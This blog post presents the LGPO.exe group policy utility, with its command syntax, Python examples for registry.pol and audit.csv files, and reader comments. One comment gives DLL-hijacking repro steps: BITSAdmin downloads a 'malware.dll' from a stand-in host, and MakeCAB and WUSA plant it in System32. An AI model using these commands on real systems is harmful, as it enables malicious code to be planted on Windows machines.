LGPO.exe – Local Group Policy Object Utility, v1.0


LGPO.exe is a new command-line utility to automate the management of local group policy. It replaces the no-longer-maintained LocalGPO tool that shipped with the Security Compliance Manager (SCM), and the Apply_LGPO_Delta and ImportRegPol tools.

Features:

  • Import settings into local group policy from GPO backups or from individual policy component files, including Registry Policy (registry.pol), security templates, and advanced auditing CSV files.
  • Export local policy to a GPO backup.
  • Parse a Registry Policy (registry.pol) file to readable "LGPO text" directly to the console or redirected to a file, which can be edited and imported into local policy.
  • Build a new Registry Policy (registry.pol) file from "LGPO text".
  • Enable group policy client side extensions for local policy processing.

The zip file attached to this post includes LGPO.exe and full documentation. This is the command line syntax:

LGPO.exe v1.00 - Local Group Policy Object utility

LGPO.exe has four modes:
  * Import and apply policy settings;
  * Export local policy to a GPO backup;
  * Parse a registry.pol file to "LGPO text" format;
  * Build a registry.pol file from "LGPO text".

To apply policy settings:

    LGPO.exe command [...]

    where "command" is one or more of the following (each of which can be repeated):

    /g path               import settings from one or more GPO backups under "path"
    /m path\registry.pol  import settings from registry.pol into machine config
    /u path\registry.pol  import settings from registry.pol into user config
    /s path\GptTmpl.inf   apply security template
    /a[c] path\Audit.csv  apply advanced auditing settings; /ac to clear policy first
    /t path\lgpo.txt      apply registry commands from LGPO text
    /e <name>|<guid>      enable GP extension for local policy processing; specify a
                          GUID, or one of these names:
                          * "zone" for IE zone mapping extension
                          * "mitigation" for mitigation options, including font blocking
                          * "audit" for advanced audit policy configuration
    /boot                 reboot after applying policies
    /v                    verbose output
    /q                    quiet output (no headers)

To create a GPO backup from local policy:

    LGPO.exe /b path [/n GPO-name]

    /b path               Create GPO backup in "path"
    /n GPO-name           Optional GPO display name (use quotes if it contains spaces)

To parse a Registry.pol file to LGPO text (stdout):

    LGPO.exe /parse [/q] {/m|/u} path\registry.pol

    /m path\registry.pol  parse registry.pol as machine config commands
    /u path\registry.pol  parse registry.pol as user config commands
    /q                    quiet output (no headers)

To build a Registry.pol file from LGPO text:

    LGPO.exe /r path\lgpo.txt /w path\registry.pol [/v]

    /r path\lgpo.txt      Read input from LGPO text file
    /w path\registry.pol  Write new registry.pol file

(See the documentation for more information and examples.)
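The /parse and /r modes above read and write the Registry Policy (registry.pol) container, and the "LGPO text" parse output is only useful if you understand what that container holds. The script below is an added example, not part of LGPO.exe or its documentation: it decodes and re-encodes the PReg layout that registry.pol uses (a "PReg" signature, a version DWORD of 1, then UTF-16LE `[key;value name;type;size;data]` records with 4-byte little-endian type and size fields). It handles the string, DWORD and MULTI_SZ types LGPO.exe emits, plus REG_QWORD, which v1.0 of the tool does not, and it shows the difference between a managed `**del.` entry (a REG_SZ holding one space, which is why such a record shows type 1 and size 4) and simply dropping every record for a value so it reverts to Not Configured. The key paths, value names and data in SAMPLE are constructed.

```python
import struct

# registry.pol starts with the "PReg" signature followed by a little-endian DWORD version of 1
PREG_HEADER = b"PReg" + struct.pack("<I", 1)

# registry value types we round-trip (numeric codes are the Windows REG_* constants)
REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD, REG_MULTI_SZ, REG_QWORD = 1, 2, 3, 4, 7, 11


def _u16(text):
    """registry.pol stores keys, value names and the [ ; ] delimiters as UTF-16LE."""
    return text.encode("utf-16-le")


def encode_data(rtype, value):
    """Turn a Python value into the raw data bytes stored for the given REG_* type."""
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return _u16(value + "\0")
    if rtype == REG_MULTI_SZ:
        return _u16("".join(s + "\0" for s in value) + "\0")
    if rtype == REG_DWORD:
        return struct.pack("<I", value)
    if rtype == REG_QWORD:          # 64-bit value; LGPO.exe v1.0 neither emits nor accepts these
        return struct.pack("<Q", value)
    if rtype == REG_BINARY:
        return bytes(value)
    raise ValueError(f"unsupported registry type {rtype}")


def decode_data(rtype, data):
    """Inverse of encode_data; unknown types come back as raw bytes."""
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return data.decode("utf-16-le").rstrip("\0")
    if rtype == REG_MULTI_SZ:
        return [s for s in data.decode("utf-16-le").split("\0") if s]
    if rtype == REG_DWORD:
        return struct.unpack("<I", data)[0]
    if rtype == REG_QWORD:
        return struct.unpack("<Q", data)[0]
    return bytes(data)


def build_registry_pol(entries):
    """Serialise (key, value name, type, value) tuples into a registry.pol byte string."""
    out = bytearray(PREG_HEADER)
    for key, name, rtype, value in entries:
        data = encode_data(rtype, value)
        # each record is [key\0;name\0;type;size;data] with 4-byte LE type and size fields
        out += _u16("[") + _u16(key + "\0") + _u16(";") + _u16(name + "\0") + _u16(";")
        out += struct.pack("<I", rtype) + _u16(";") + struct.pack("<I", len(data)) + _u16(";")
        out += data + _u16("]")
    return bytes(out)


def parse_registry_pol(blob):
    """Parse a registry.pol byte string back into (key, value name, type, value) tuples."""
    if blob[:8] != PREG_HEADER:
        raise ValueError("not a version-1 PReg registry.pol file")
    pos, entries = 8, []

    def read_string():
        nonlocal pos
        start = pos
        while blob[pos:pos + 2] != b"\0\0":      # scan UTF-16 code units for the terminator
            pos += 2
            if pos >= len(blob):
                raise ValueError("unterminated string in registry.pol")
        text = blob[start:pos].decode("utf-16-le")
        pos += 2
        return text

    def expect(delim):
        nonlocal pos
        if blob[pos:pos + 2] != _u16(delim):
            raise ValueError(f"expected {delim!r} at offset {pos}")
        pos += 2

    while pos < len(blob):
        expect("[")
        key = read_string(); expect(";")
        name = read_string(); expect(";")
        rtype = struct.unpack_from("<I", blob, pos)[0]; pos += 4; expect(";")
        size = struct.unpack_from("<I", blob, pos)[0]; pos += 4; expect(";")
        data = blob[pos:pos + size]; pos += size
        expect("]")
        entries.append((key, name, rtype, decode_data(rtype, data)))
    return entries


def delete_value_entry(key, name):
    """Managed removal: a '**del.<name>' REG_SZ record holding one space (type 1, size 4)
    makes policy processing delete the value on every refresh."""
    return (key, "**del." + name, REG_SZ, " ")


def unmanage(entries, key, name):
    """Revert a value to Not Configured: drop every record (set or **del.) that references it."""
    wanted = {name.lower(), ("**del." + name).lower()}
    return [e for e in entries
            if not (e[0].lower() == key.lower() and e[1].lower() in wanted)]


# Constructed sample policy: keys, names and data are made up for this example.
SAMPLE = [
    ("Software\\Policies\\Example\\Logging", "LogLevel", REG_DWORD, 3),
    ("Software\\Policies\\Example\\Logging", "LogPaths", REG_MULTI_SZ, ["C:\\Logs", "D:\\Logs"]),
    ("Software\\Policies\\Example\\Logging", "LastModified", REG_QWORD, 0x01D4A3B2C1D0E0F0),
    delete_value_entry("Software\\Policies\\Example\\Test", "NewValue"),
]

if __name__ == "__main__":
    for key, name, rtype, value in parse_registry_pol(build_registry_pol(SAMPLE)):
        print(f"{key};{name};type={rtype};{value!r}")
```

Feed `parse_registry_pol()` the bytes of a real registry.pol (for example one captured from a GPO backup) to list what a machine's local policy actually manages; the `**del.` records are worth a look on any box where a value keeps disappearing, since they remove the value on every refresh rather than just once.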

[Update: the latest version of LGPO.exe is here.]


Comments (75)

  1. O.K. says:

    Why is there no Support for MLGPO?

    [Aaron Margosis] I've never had a need for it, and no one in any of the customer spaces I've worked with has ever asked me to add that.

  2. Nils T says:

    Hi,
    With the deprecated LocalGPO tool you could create the LocalGPO Packs and apply those from the command line to specific users. I think I'm talking about the same thing as the poster above.
    This was really handy in some situations before.
    So even if it is not implemented yet, is it possible to integrate this in the future to apply registry.pol files or LGPO texts to specific user accounts only?

  3. CSM says:

    Hi,

    Thank you for your excellent work. We make heavy use of the mlgpo function as well, it adds a flexibility I cannot find an easy replacement for. Any chance of adding that functionality back in?

    [Aaron Margosis] I'll raise the priority. Note also that while LocalGPO is not being maintained, it can still be downloaded with the SCM.

    Can you describe in more detail how you use MLGPO and the value it provides? Thanks.

  4. Chris says:

    Any chance the LGPO source code will be posted as with the old tools? It makes it way easier for software to be approved for use if the source is available.

    [Aaron Margosis] Probably not this time. This one is digitally signed, though.

  5. Ken says:

    When applying multiple registry-based commands from an “LGPO text” file using the /t command and then sysprep a W10v1511 getting [0x0f0083] SYSPRP ActionPlatform::LaunchModule: Caught an unhandled exception while trying to load and execute 'ProvPackageSysprepGeneralize' from C:\Windows\System32\ProvSysprep.dll – normally these LGPO text files are about 10 or so files but place it into one file / remove user and only computer settings, same error. Remove the LGPO /t settings and it will sysprep. These are set in a MDT task sequence

    [Aaron Margosis] Based on your description, it doesn't sound like the LGPO tool is the cause — more like the policies you're pushing in are causing Sysprep to fail somehow.

  6. Omar says:

    Hello, I just wanted to weigh in. We too use the MLGPO command from LocalGPO extensively when deploying kiosk and some user computers. It allows setting policies for specific users. This has become a vital component in our environment; if I could use LocalGPO
    with Windows 10 I would. LocalGPO does a great job of applying machine policies but does not have the ability to restore or set MLGPO policies on Windows 10 devices.

    If LGPO has this functionality I would be a happy camper 🙂

    Issues with LocalGPO on Windows 10
    I have patched the file so that it may work on Windows 10, here's the link
    https://social.technet.microsoft.com/Forums/en-US/e98d8ac5-b091-4209-bc0d-02ba020666e0/localgpo-tool-for-windows-81?forum=compliancemanagement

    If I run:
    cscript "C:\Program Files (x86)\LocalGPO\"LocalGPO.wsf /Restore
    I receive:
    (1403, 10) WshShell.Run: Unable to wait for process.

    If I run:
    cscript "C:\Program Files (x86)\LocalGPO\"LocalGPO.wsf /Path:"C:\Program Files ……. /MLGPO:kiosk
    I receive:
    Windows XP and Windows Server 2003 do not support MLGPO!!

    I understand LocalGPO was not created for Windows 10 but if MLGPO becomes a part of LGPO that would be very beneficial. Thank You

  7. Jason Walker says:

    I'm having an issue with importing audit.csv settings, on Win 7 Enterprise x64.

    If I import with "/a" (do not clear existing settings), the new setting appears to be active according to auditpol.exe /get, but the System32\GroupPolicy\Machine\microsoft\windows nt\audit\audit.csv is not updated, and at the next 'gpupdate' the setting reported by auditpol.exe reverts to the previous value defined in audit.csv.

    If I import with "/ac" (clear existing settings), the copy of audit.csv at system32\grouppolicy\machine\microsoft\windows nt\audit\audit.csv is replaced with the new value and everything appears to work.

    Am I doing something wrong here?

    [Aaron Margosis] No, that's the best that LGPO.exe can do, at least for now. What appears in the Group Policy editor is not necessarily what's actually in effect. See this Ned Pyle blog post for more information.

    The LGPO.exe documentation says this:

    /a[c] path\audit.csv

    Apply an Advanced Auditing backup (CSV) file. With /ac, LGPO.exe clears existing Advanced Auditing settings before applying the settings from the CSV file, and copies the file to the local group policy subdirectory so that the settings appear in the local group policy editor.

  8. CSM says:

    We use MLGPO to apply policies specific to users and groups of users. It is primarily used on non-domain systems to establish policies for non-admins, both on workstations and terminal servers. It is also a key component of kiosk systems for us as well.
    Apologies for the late reply.

  9. Jason Walker says:

    Maybe I'm missing something. I don't think this is only limiting the ability to view values in the group policy editor.

    After executing lgpo.exe /a , the results of "auditpol.exe /get" reflect the new value, but _only_ until the next gpupdate executes. After gpupdate executes, the system reverts back to the previous setting (which remained defined in audit.csv). Does this imply that lgpo.exe /a is ineffective at permanently adding advanced audit settings?

    I'm going to attempt to workaround this in script, by retrieving the current audit.csv, modifying it to merge in the new values I wish to apply, then using lgpo.exe /ac to apply the now-complete audit.csv. That's still more complex than what I had hoped for when I saw this new tool appeared to be able to modify the advanced audit settings.

    [Aaron Margosis] Your analysis is correct. With /a, lgpo.exe invokes "auditpol.exe /restore" but as you point out that doesn't touch the local policy store. I had wanted to avoid having to write an audit.csv parser, let alone an audit.csv editor. That may be needed if lgpo.exe is to be a complete solution.
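The workaround Jason describes above (retrieve the current audit.csv, merge the new values into it, then apply the complete file with LGPO.exe /ac) in Python, as an added example that is not part of LGPO.exe or its documentation. It reads two files in the seven-column layout that auditpol.exe /backup produces and /restore consumes, keys each row on its Subcategory GUID (falling back to the Subcategory name for global-SACL rows, which carry no GUID), lets the new file win where both define the same subcategory, and writes a merged CSV ready for /ac. The two CSV strings are constructed sample input; the subcategory GUIDs are the standard ones auditpol reports for those subcategories.

```python
import csv
import io

# Column layout of audit.csv as written by auditpol.exe /backup and read by auditpol.exe /restore
AUDIT_HEADER = ["Machine Name", "Policy Target", "Subcategory", "Subcategory GUID",
                "Inclusion Setting", "Exclusion Setting", "Setting Value"]


def read_audit_csv(text):
    """Parse audit.csv text into a list of row dicts, refusing files with a different header."""
    reader = csv.DictReader(io.StringIO(text, newline=""))
    if reader.fieldnames != AUDIT_HEADER:
        raise ValueError(f"unexpected audit.csv header: {reader.fieldnames}")
    return list(reader)


def write_audit_csv(rows):
    """Serialise rows back to audit.csv text with CRLF line endings."""
    buf = io.StringIO(newline="")
    writer = csv.DictWriter(buf, fieldnames=AUDIT_HEADER, lineterminator="\r\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def row_key(row):
    """Subcategory rows are identified by GUID; global-SACL rows (e.g. FileGlobalSacl)
    carry no GUID, so fall back to the Subcategory column."""
    return (row["Subcategory GUID"] or row["Subcategory"]).strip().lower()


def merge_audit_policies(existing_text, new_text):
    """Overlay the rows of new_text on existing_text: rows with the same key are replaced,
    everything else is kept, so the result is a complete file suitable for LGPO.exe /ac."""
    merged = {row_key(r): r for r in read_audit_csv(existing_text)}
    for row in read_audit_csv(new_text):
        merged[row_key(row)] = row          # new setting wins; dict keeps insertion order
    return write_audit_csv(list(merged.values()))


def drop_subcategories(text, names):
    """Remove rows whose Subcategory matches one of names (case-insensitive)."""
    unwanted = {n.lower() for n in names}
    kept = [r for r in read_audit_csv(text) if r["Subcategory"].lower() not in unwanted]
    return write_audit_csv(kept)


# Constructed sample input. Setting Value: 0 = no auditing, 1 = success, 2 = failure, 3 = both.
EXISTING_CSV = (
    "Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value\r\n"
    ",System,Audit Logon,{0CCE9215-69AE-11D9-BED3-505054503030},Success and Failure,,3\r\n"
    ",System,Audit Process Creation,{0CCE922B-69AE-11D9-BED3-505054503030},Success,,1\r\n"
    ",,FileGlobalSacl,,,,\r\n"
)
NEW_CSV = (
    "Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value\r\n"
    ",System,Audit Logon,{0CCE9215-69AE-11D9-BED3-505054503030},Failure,,2\r\n"
    ",System,Audit Logoff,{0CCE9216-69AE-11D9-BED3-505054503030},Success,,1\r\n"
)

if __name__ == "__main__":
    print(merge_audit_policies(EXISTING_CSV, NEW_CSV), end="")
```

In practice the first argument is the contents of the audit.csv under the local GroupPolicy directory (or the output of auditpol.exe /backup, which reflects the effective settings rather than the policy store), the second is the file holding the changes you want, and the written result is what you hand to LGPO.exe /ac. `drop_subcategories()` is the same row selection used to strip a row you do not want carried to other machines.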

  10. Jason Walker says:

    I don't want to sound unappreciative on the audit policy restore. Parsing the CSV myself and applying with LGPO.exe /ac is working like a charm, and it's very nice to have Secedit policy, Registry policy, and Audit policy all in one tool. Thanks much, this tool is looking to be very helpful for me!

    [Aaron Margosis] I'm glad it's of help. And I appreciate the helpful feedback.

  11. Chuck says:

    In using LGPO's "Exporting local policy to a GPO backup" the files Backup.xml and Bkupinfo.xml have "Contoso.test" in all of the domain name references. The local policy that was backed up came from a domain workstation at work. Maybe I don't fully understand how GPO backup (and restore) works, but should these two files be referencing contoso or should the real domain name be stored in those two files?

    [Aaron Margosis] The "real domain name" in this case would be the local computer name, which wouldn't be of any interest on any other computer.

  12. Chuck says:

    Thanks for the quick reply, Aaron. Apologies — I should have stated my whole concern in the first post. I'd like to take this LGPO backup from a test suite and import it into a production suite. How do those references to domain "Contoso.test" resolve when restoring this backup into a different domain? Or, is some kind of manual editing needed to make the LGPO backup suitable for restoring in a different domain? Thanks again.

    [Aaron Margosis] From what I've seen, it's not an issue. I pretty much copied what the older LocalGpo tool did in this regard, and I don't remember hearing of any problems with it. If I remember correctly, the way I've seen this work is to create a new GPO in AD, then choose Import Settings and pick the local backup. I don't think the "Contoso" designations matter at that point – I believe the import picks up only the settings.

  13. Joe says:

    Hi Aaron,

    We basically came across your tool as our requirements led us to get around 200+ workgroup servers in our DMZs to apply a set of settings from local group policies.
    So if I understand that right, I will just take a GPO from our domain, export it and import it with LGPO.exe /g Path – so that's straightforward.
    What I miss here (or have I missed it?) is the possibility to reset the settings to default – as when I import a previously exported "empty" GPO, that won't change anything.
    As you can imagine – when I deploy those settings to a couple of hundred servers, I do need a way back 😉

    Thanks!

    [Aaron Margosis] It depends on the settings. On the whole, you should capture a backup before you apply the new settings. Note though that some settings that can be applied through a security template don't show up in backups. Advanced Auditing settings shouldn't be a problem. For the registry.pol settings (Administrative Templates and a few others), you could probably delete the registry.pol files and apply the ones you captured in a backup.

    FWIW, I never trusted the "restore OS default" mechanism that the old LocalGPO script implemented, and I opted not to try to implement it in LGPO.exe.

  14. CSM says:

    I am still looking for a way to make this work in 2016/Windows 10, I am happy to work with the old vb script to try and get it working, but I would appreciate any suggestions you might have on how to adjust that script so it works properly in the new OS. Thank you.

    [Aaron Margosis] I assume you're referring to the not-yet-implemented MLGPO feature.

    I don't know whether this is a complete fix, but edit LocalGpo.wsf, find the line that says

            If(Left(strOpVer,3) = "6.2") and (strProductType <> "1") then

    and in that block, add something like this (NOT TESTED):

            If(Left(strOpVer,3) = "10.") then

    Keep the assignment the same for this case:

        strOS = "Win8"

    If you assign it something like "Win10" the rest of the script won't recognize it.

  15. MsHS says:

    I'd also like to add my request to have MLGPO functionality added. In our organization we'd like to be able to apply specific policies to select users on workstations and kiosks so this functionality is very useful. Thank you.

  16. Jason Walker says:

    Is there any ability to remove a setting from Registry.pol (i.e. changing to "Not Configured") using the LGPO text format?
    According to the PDF, the "DELETE" action behaves as "Deletes the value (reverting a policy to "Not Configured" – but the behavior I see from trying to remove the value HKLM\Software\Test\NewValue from management is that the "Software\Test;**del.NewValue;%01;%04;" directive is added to Registry.pol, so the value is removed from the Registry each time Group Policy is reapplied. That's not equivalent to "Not Configured", that's actually "Managed Removal of Registry Key".

    What I'm looking for is an ability to "Un-Do" the management of a registry key value, to have no reference to that key remaining in Registry.pol. Is there a better option than 1) Dump current registry.pol to text 2) Delete the reference in the text export 3) Delete registry.pol 4) import the modified text?

    [Aaron Margosis] I think that's probably the best way. LGPO.exe doesn't have the ability to edit the registry.pol file directly.

  17. Consider this another vote for MLGPO support. The GPOPack.wsf from SCM / MDT can copy to MLGPO, but unfortunately does not merge settings, it only overwrites them. Having a single tool that can handle all the forms of Local Group Policy would be great.

  18. MT says:

    Aaron,
    We could use LocalGPO.wsf to make "MSS:" settings editable: Cscript LocalGPO.wsf /ConfigSCE. You stated that the LocalGPO tool won't be supported any longer. What should we use as a replacement in order to be able to work with "MSS:"?
    Thank you.

    [Aaron Margosis] We included a replacement in the Win10 baselines in the form of a custom ADMX and ADML file. Install those files in the appropriate locations and then find the settings in your Group Policy editor in Computer Configuration | Administrative Templates | MSS (Legacy).

  19. Fred says:

    Hi Aaron,

    thank you very much for your good work.
    We're using LGPO.exe quite often for exporting local machine / user policies.
    After that we deploy/import them on other systems.

    One question…
    Is it possible to empty/clear/reset a local machine/user config ?
    So that every local policy is set to “not configured” ?

    Thanks in advance

  20. Sarah says:

    [Obligatory preface] Hi, please forgive me in advance, as I am a very fresh IT intern at an incredibly disorganized (and under-staffed!) non-profit. My main task as of late is configuring many new machines -most of which we don’t have images for- so I’m building these from scratch and implementing all of the necessary configurations. We also are running Server 2003, but are receiving a large influx of Surface tablets (that I cannot image, or basically have fumbled around with third party imaging software for long enough that I gave up due to time constraints) and I’m looking for a utility to streamline part of this process. I have no experience with this utility and its functionality, and my scripting knowledge is similarly limited.

    I am looking to simply replicate my Local Group Policy settings via script, and from what I’ve read, this utility should be able to manage that for me very simply. As I’ve mentioned before, I have limited access to the domain, etc, so I’m relying on all of this being done on the local machine’s admin account.

    I’ve downloaded the zip file (https://msdnshared.blob.core.windows.net/media/TNBlogsFS/prod.evol.blogs.technet.com/telligent.evolution.components.attachments/01/4062/00/00/03/65/94/81/Windows%2010%20TH2%20Security%20Baseline.zip) and extracted it, I’ve read through the documentation provided, but am experiencing issues (probably a very simple command line error) getting the utility to run on my Win 10 machine. After having several goes at installing the client and running the application, I still receive an error when attempting to run the LGPO.exe command (etc) to export my Group Policy configuration to the specified path.

    Is there perhaps a manual for novices like myself trying to take a crack at this utility? Thanks in advance for your help, and I appreciate any response as I know it may be frustrating dealing with a ‘green’ tech.

    1. Sarah says:

      My apologies, the error I mentioned before states that the LGPO.exe isn’t found/cannot be located.

      [Aaron Margosis] In the zip file, LGPO.exe is in the “Windows 10 TH2 Security Baselines\Local_Script\Tools” folder.

  21. S Sims says:

    We are using the LGPO.exe tool to export Local Group Policy settings in Windows 10 (using LGPO.exe /b) and then import the settings on other Windows 10 PCs (using LGPO.exe /g). All of the PCs are standalone PCs and are NOT networked or part of a domain. We have noticed some issues when exporting/importing. All of the issues appear to relate to the audit.csv file. We are using the “Advanced Audit Policy Configuration” so the policy “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” is enabled.

    1 – The LGPO tool attempts to overwrite the audit.csv held on the local machine (in C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit). However, during testing it was apparent that this sometimes fails despite being run with admin privileges. The LGPO tool does report the failure but it’s easy to miss. If it does fail then your policy settings in [Computer Configuration->Windows Settings->Security Settings->Advanced Audit Policy Configuration] will not be applied. We have found the most reliable work around to this is to manually delete the audit.csv in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit” before performing an LGPO import.

    2 – When LGPO perform the export, it does NOT copy the audit.csv file in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”. Instead, it builds the audit.csv file from all of the local group policy settings defined in the “Advanced Audit Policy Configuration”. This generated audit.csv is then copied to the Audit directory on the target PC when the LGPO import is performed. We have experienced some strange desktop issues once the import is applied on another PC. The issue is not immediately apparent and requires a PC reboot. The main error that we have encountered is : “c:\windows\system32\config\systemprofile\desktop is unavailable”. In addition, the Start Menu is unavailable and other components such as OneDrive appear to fail. Through the process of elimination we have narrowed these errors down to one single line entry in the exported audit.csv file :

    ,,FileGlobalSacl,,,,

    If this line is removed from the exported audit.csv file then we do not encounter any problems. Assuming the export is to the C:\Temp directory, our current work-around is to :

    Step 1 – Export the Local Group Policy Settings using : LGPO.exe /b C:\Temp\
    Step 2 – Overwrite generated audit.csv file in “C:\Temp\{GUID}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv” with the audit.csv from “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”.
    Step 3 – Import the Local Group Policy settings on another PC using : LGPO.exe /g

    Unless configured, the audit.csv copied in Step 2 will not contain the FileGlobalSacl definition.

    [Aaron Margosis] That’s very strange. What errors is LGPO reporting? FWIW, LGPO.exe /b captures the full set of existing advanced auditing settings with “auditpol.exe /backup”. That can be different from what’s in the Group Policy directory. That’s odd that application of the default FileGlobalSacl setting would cause problems like that, particularly the Start menu failure. I have to suspect that there are other things going on at the same time. Are you applying AppLocker rules? I’ve seen misapplication of AppLocker cause the Start menu to fail.

    1. S Sims says:

      LGPO doesn’t report any errors when we do an import (using /g). It’s only evident that a problem has occurred on reboot (gpupdate /force doesn’t cause it to fail). Yes we are applying AppLocker rules so I will double check those. It does look like the audit.csv is causing the problem though since replacing the exported audit.csv with the one held on the local machine appears to fix the problem.

  22. Chilli Peppa says:

    Can this executable be redistributed in a commercial product? I didn’t see any license information in the documentation.

    [Aaron Margosis] No. Please link back to this site. Thanks.

  23. Pete says:

    The LGPO utility errors out when you set MaximumPasswordAge=0. If I change it to any other number it works fine. (I also have MinimumPasswordAge=0.)

    [Aaron Margosis] This is kind of a weird one. If you go into the Security Templates GUI and set Maximum Password Age to 0, it actually writes -1 in the security template file. If you manually edit the security template file and put MaximumPasswordAge = 0, it’s an invalid value.

  24. Kevin says:

    Consider this another vote for MLGPO support, I work in a library and all of our Public workstations are on a completely separate network far away from our Domain server. I use MLGPO on all of these public workstations to limit what the users have access to on these machines.

    [Aaron Margosis] Vote acknowledged. Thanks for the feedback.

  25. Eddy Current says:

    You forgot to inhibit that LGPO.exe can be run on Windows Vista, Windows 7 and Windows Server 2008 [R2] when KB2533623 is not installed there!
    CWE-426 and CWE-427 should really be well-known after 15+ years now!

    [Aaron Margosis] Can you provide repro steps for an actual compromise? When LGPO.exe starts external processes, it always specifies the full path. LGPO.exe cannot enforce that the system is up to date, nor that it is not in a user-writeable directory and has not been modified.

    1. Eddy Current says:

      LGPO.exe loads api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll
      These files don’t exist on Windows 7 and earlier.
      Take a look at recent MSRC bulletins: this vulnerability was fixed in some Windows components (and still needs to be fixed in quite some more)

    2. Eddy Current says:

      Please eat your own dogfood!
      Call one of the new Win32 APIs introduced with KB2533623, for example (really: best) SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)
      This removes the “application directory” from the DLL search path.
      DEFENSE IN DEPTH — the !Microsoft way

    3. Eddy Current says:

      Under the user account created during Windows setup run the following command lines from Start->Run:

      BITSAdmin.exe /Transfer foobar http://example.com/malware.dll “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll”
      MakeCAB.exe “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll” “%TEMP%\foobar.cab”
      WUSA.exe “%TEMP%\foobar.cab” /Extract:”%SystemRoot%\System32″

      1. If you’re starting LGPO.exe in a directory the attacker controls, the attacker can also modify LGPO.exe directly. And if the attacker can write arbitrary content into the System32 directory, it’s already game over.

        1. Eddy Current says:

          LGPO.exe is digitally signed with a Microsoft certificate, tampering with the binary invalidates it signature.
          The unmodified, signed and trusted binary but loads and executes untrusted code when run from an untrusted location.

          Default installations of Windows allow users to write to System32, WITHOUT triggering an UAC prompt!
          Is this “game over” enough?

          [Aaron Margosis] That’s not true, and you should already know that. Good night.

        2. Eddy Current says:

          If you start LGPO.exe under Windows 7 (this is the Windows version with the biggest market share) from a trusted directory it will load api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll from the PATH
          GET A CLUE!

          1. Mr. Current: not only are you the rudest troll to infect any blog I’ve worked on, you’re also not as clever as you think you are. Ordinarily, I’d patiently explain why you’re mistaken, but I’m not going to waste any more of my time on you. And all future ill-mannered comments from you get deleted. Good night.
          2. [Aaron Margosis] In case anyone was wondering, yes, Mr. Current became only more insulting, so those follow-ups have been unpublished. There’s absolutely no call for rudeness, disrespect, or insults, and I won’t allow it on any blog I control. You are free to disagree with me, and to prove me wrong about a technical issue, as long as we are engaged in respectful and civil conversation. I don’t care how ugly the rest of the internet is, ugly’s not happening here.

  26. Eddy Current says:

    LGPO.exe SHOULD write a warning to stderr when it creates text output files which can’t restore the registry.pol completely, but write
    ;;; —- Commented out because “LGPO.exe /t” cannot process this command
    to stdout.

    OTOH processing/implementing of REG_QWORD for export and import should be possible: SAFER rules need this, for example.

    JFTR: why did you “invent” your own format for the LGPO text files? The well-known format of registry entries in .INF files is a single line and should be easier to parse/implement!

    [Aaron Margosis] Good idea about outputting to stderr when registry.pol commands can’t be handled correctly.

    I hadn’t implemented QWORD because I hadn’t come across an actual need and no one had asked for it. Are you actually implementing SAFER rules? I haven’t seen anyone use those in well over a decade.

    I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values, deleting a value, and deleting all values in a key.

    1. Eddy Current says:

      | Are you actually implementing SAFER rules?

      Of course, for more than 12 years, on all versions and editions of Windows.

      | I haven’t seen anyone use those in well over a decade.

      Better look at the bright side of life.-P

      | I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values,

      That’s FLG_REG_KEYONLY, 0x10

      | deleting a value,

      That’s FLG_ADDREG_DELVAL, 0x4

      | and deleting all values in a key.

      Please dare to extend the existing format as necessary: you can always introduce new flags.
      My proposal is to reuse the existing and well-known “AddReg” syntax:
      ,[],[],[,]

      1. Eddy Current says:

        ARGH!
        The blog software sucks, it eats < and >
        | ,[],[],[,]

        hive,[key, name],[value name],flag|type[,value data]

    2. Jason Walker says:

      I too am using Software Restriction Policies (Safer) and am having trouble with LGPO’s lack of qword functionality. By failing to import the “LastModified” qword value, but still importing the remaining Software Restriction Policies, I end up with machines that not only fail SRP, but also cannot produce Group Policy Results from either the GPMC wizard or gpresult /h. Instead I get a message “object reference not set to an instance of an object”

      [Aaron Margosis] OK. I’ll add it to the list. I didn’t think anyone was still using SRP. What does it give you that you can’t get from AppLocker and/or Device Guard?

      1. Jason Walker says:

        Sorry for the late reply, I think I missed a notification on your comment.
        What Software Restriction Policies gets me, is actually very little. A percentage point on a CIS benchmark score and a security auditor who chastises me (a little) less.
        SRP is also available on Professional editions, where AppLocker requires Enterprise or Ultimate, but we are going third-party for whitelisting.
        I’ve since stopped trying to apply SRP policies with LGPO, but it’s been handling all my other (non-QWORD) tasks fine. I see there’s a LGPO 2.0 prerelease, I look forward to checking it out soon. Thanks for the great work and support!

  27. Justin Smith says:

    Can LGPO reset local policy, or be given a set of policy to _remove_?

    I’m trying to implement SAFER rules, and need a way to add/remove them on-demand.
    Yes, we’re actually using them, unless there’s a better way to block executables in %AppData%. As an MSP, our app lists are too large and varied to reasonably implement an Applocker whitelist.

    1. Re “reset”: If you mean to revert to “Not Configured,” no, not really. One way I’ve done it is to export the existing Registry.pol settings to a text file, edit the text file to remove the unwanted settings, delete the registry.pol file, then import the text file using LGPO.exe. The other way is to explicitly set the policies you want to remove to enforce the defaults.
    2. Eddy Current says:

      SAFER reads its rules and settings only from the registry, not from the registry.pol file.
